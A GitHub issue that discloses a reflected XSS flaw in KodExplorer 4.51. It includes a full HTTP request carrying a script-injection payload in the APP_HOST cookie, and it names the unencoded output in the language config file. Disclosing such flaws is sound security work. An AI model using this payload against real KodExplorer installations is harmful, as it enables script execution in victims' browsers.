Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

KodExplorer 4.51 has a reflective XSS vulnerability #526

Open
Hebing123 opened this issue Nov 23, 2023 · 1 comment
Open

KodExplorer 4.51 has a reflective XSS vulnerability #526

Hebing123 opened this issue Nov 23, 2023 · 1 comment

Comments

@Hebing123
Copy link

GET /index.php?user/login HTTP/1.1
Host: 192.168.160.130:6699
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: APP_HOST=http://192.168.160.130:6699/"><ScRiPt%20>alert(9876)</ScRiPt>
Upgrade-Insecure-Requests: 1

image

The utilization method is relatively complex Need to modify the APP in the cookie header_ HOST, which can be done through HTML or other methods.

@Hebing123
Copy link
Author

The vulnerability occurs on line 308 of config/i18n/en/main.php.

The APP_HOST originating from the cookie was directly referenced into the page by% s without entity encoding.

@Hebing123 Hebing123 changed the title The latest version of KodeExplorer has a reflective XSS vulnerability KodeExplorer 4.51 has a reflective XSS vulnerability Dec 15, 2023
@Hebing123 Hebing123 changed the title KodeExplorer 4.51 has a reflective XSS vulnerability KodExplorer 4.51 has a reflective XSS vulnerability Feb 23, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant